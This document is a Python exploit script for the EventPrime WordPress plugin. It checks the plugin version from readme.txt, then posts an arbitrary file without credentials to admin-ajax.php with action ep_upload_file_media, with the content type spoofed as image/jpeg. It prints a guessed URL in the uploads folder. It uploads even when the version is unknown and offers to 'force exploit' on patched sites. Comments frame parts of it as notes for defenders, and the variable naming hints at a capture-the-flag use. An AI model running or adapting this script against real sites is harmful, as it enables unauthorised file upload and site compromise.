import requests
import re
import sys
import json
import urllib3
import os
from datetime import datetime
# Silences urllib3's InsecureRequestWarning for the whole process. Every HTTP
# call in this script passes verify=False, so server certificates are never
# validated; with this call the console also stops saying so.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# ANSI escape sequences used to colour terminal output.
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
CYAN = '\033[96m'
# RESET ends a coloured span; BOLD is combined with a colour for emphasis.
RESET = '\033[0m'
BOLD = '\033[1m'
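def check_version(target_url):
    """Return the plugin version advertised in its public readme.txt, or None.

    Fetches the EventPrime plugin's ``readme.txt`` from the target and extracts
    the value of its ``Stable tag:`` line.

    Args:
        target_url: Base URL of the site, without a trailing slash.

    Returns:
        The version string (digits and dots) on success; ``None`` when the
        request fails, the status is not 200, or no ``Stable tag:`` line is
        found.

    Note:
        The value is whatever the readme file says. A missing or edited readme
        yields ``None`` or a stale number, so this is a hint about the
        installed version, not proof of it.
    """
    readme_path = "/wp-content/plugins/eventprime-event-calendar-management/readme.txt"
    try:
        # verify=False: the server certificate is not validated, so the answer
        # is only as trustworthy as the network path to the host.
        response = requests.get(target_url + readme_path, verify=False, timeout=10)
    except requests.RequestException:
        # Only transport/URL errors are treated as "unknown version". The
        # original bare `except:` also swallowed KeyboardInterrupt, so an
        # operator's Ctrl-C here was ignored and main() carried on to the
        # upload step.
        return None

    if response.status_code != 200:
        return None

    version_match = re.search(r"Stable tag: ([\d.]+)", response.text)
    return version_match.group(1) if version_match else None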
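def is_vulnerable(version):
    """Return True when *version* is at or below the affected ceiling.

    The ceiling hard-coded here is 4.2.8.4, and it is inclusive: a site
    reporting exactly that version is treated as affected.

    Args:
        version: Dotted numeric version string such as ``"4.2.8.3"``, or a
            falsy value when the version is unknown.

    Returns:
        ``True`` if the version compares less than or equal to 4.2.8.4,
        ``False`` otherwise, including when *version* is empty/``None`` or
        holds no numeric component.

    Raises:
        ValueError: If a component is not an integer (e.g. ``"4.2-beta"``).
    """
    if not version:
        return False

    # The caller's regex ([\d.]+) can capture stray dots ("4.2.8.4."), which
    # made int('') raise in the original; empty components are dropped instead.
    parts = [int(p) for p in version.split('.') if p]
    if not parts:
        return False

    vulnerable_until = [4, 2, 8, 4]

    # Pad both sides with zeros to a common length so that "4.2" compares as
    # 4.2.0.0 and "4.2.8.4.1" compares as newer than the ceiling. The original
    # loop ignored components beyond the fourth and reported such versions as
    # affected.
    width = max(len(parts), len(vulnerable_until))
    padded_parts = parts + [0] * (width - len(parts))
    padded_ceiling = vulnerable_until + [0] * (width - len(vulnerable_until))
    return padded_parts <= padded_ceiling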
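def upload_file(target_url, file_path):
    """POST a local file to the target's admin-ajax endpoint and print the outcome.

    The request carries ``action=ep_upload_file_media`` plus the file in a
    multipart field named ``file``. No cookie, nonce or other credential is
    attached. Nothing is returned; every result is reported on stdout.

    Review notes for defenders:
      * The multipart part is always labelled ``image/jpeg`` regardless of the
        file's real content, so a server-side check has to look at the content
        and extension, not at the client-declared type.
      * The request shape is a credential-less POST to
        ``/wp-admin/admin-ajax.php`` whose body contains
        ``action=ep_upload_file_media``; the script then expects the stored
        file under ``/wp-content/uploads/<year>/<month>/``.
      * ``verify=False`` disables TLS certificate validation for the request.

    Args:
        target_url: Base URL of the site, without a trailing slash.
        file_path: Path of the local file to send.
    """
    ajax_url = target_url + "/wp-admin/admin-ajax.php"
    filename = os.path.basename(file_path)
    print(f"{CYAN}[*] Attempting file upload...{RESET}")

    try:
        with open(file_path, 'rb') as f:
            files = {'file': (filename, f, 'image/jpeg')}
            data = {'action': 'ep_upload_file_media'}
            response = requests.post(ajax_url, data=data, files=files, verify=False, timeout=20)
    except Exception as e:
        # Covers an unreadable local file as well as transport errors.
        print(f"{RED}[-] Error during upload: {str(e)}{RESET}")
        return

    if response.status_code != 200:
        print(f"{RED}[-] HTTP Error: {response.status_code}{RESET}")
        return

    try:
        res_json = response.json()
    except ValueError:
        # Only a body that is not JSON lands here. The original bare `except:`
        # gave this message for any error in the block (a missing key, a
        # non-object body) and also swallowed KeyboardInterrupt.
        print(f"{RED}[-] Failed to parse JSON response.{RESET}")
        return

    # A JSON body that is not an object (e.g. a bare number) or that lacks a
    # truthy "success" is a refusal, and is reported as one.
    if not (isinstance(res_json, dict) and res_json.get('success')):
        print(f"{RED}[-] Server rejected the file. Response: {response.text}{RESET}")
        return

    payload = res_json.get('data')
    # Prints None when the response carries no attachment id.
    attachment_id = payload.get('attachment_id') if isinstance(payload, dict) else None

    print(f"{GREEN}{BOLD}[+] SUCCESS: File Uploaded!{RESET}")
    print(f"{GREEN}[+] Attachment ID: {attachment_id}{RESET}")

    # The path is built from this machine's clock and the original filename;
    # it is a guess, not something the server reported.
    now = datetime.now()
    year_month = now.strftime("%Y/%m")
    final_url = f"{target_url}/wp-content/uploads/{year_month}/{filename}"
    print(f"{YELLOW}[!] Predicted URL: {final_url}{RESET}")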
def main():
    """Command-line entry point: ``<script> <url> <file>``.

    Reads the target base URL and a local file path from ``sys.argv``, asks
    check_version() for the plugin version and then branches:

      * version unknown: upload_file() is called without any confirmation;
      * version judged affected by is_vulnerable(): upload_file() is called;
      * version judged not affected: the operator is asked on stdin and
        upload_file() runs only on a ``y`` answer.

    Exits with status 1 when fewer than two arguments are supplied.
    """
    print(f"\n{BOLD}{BLUE}=== EventPrime Vulnerability Checker ==={RESET}\n")

    if len(sys.argv) < 3:
        print(f"{YELLOW}Usage: python3 {sys.argv[0]} <url> <file>{RESET}")
        sys.exit(1)

    # A trailing slash is stripped because the helpers append absolute paths.
    target, flag_file = sys.argv[1].rstrip('/'), sys.argv[2]

    detected = check_version(target)
    if not detected:
        print(f"{YELLOW}[!] Could not detect version. Trying anyway...{RESET}")
        upload_file(target, flag_file)
        return

    print(f"{CYAN}[*] Detected Plugin Version: {BOLD}{detected}{RESET}")

    if is_vulnerable(detected):
        print(f"{RED}{BOLD}[!] STATUS: VULNERABLE!{RESET}")
        upload_file(target, flag_file)
        return

    print(f"{GREEN}[+] STATUS: NOT VULNERABLE (Safe Version){RESET}")
    answer = input(f"{YELLOW}[?] Force exploit anyway? (y/n): {RESET}").lower()
    if answer == 'y':
        upload_file(target, flag_file)
# Run main() only when the file is executed as a script, not when it is imported.
if __name__ == "__main__":
    main()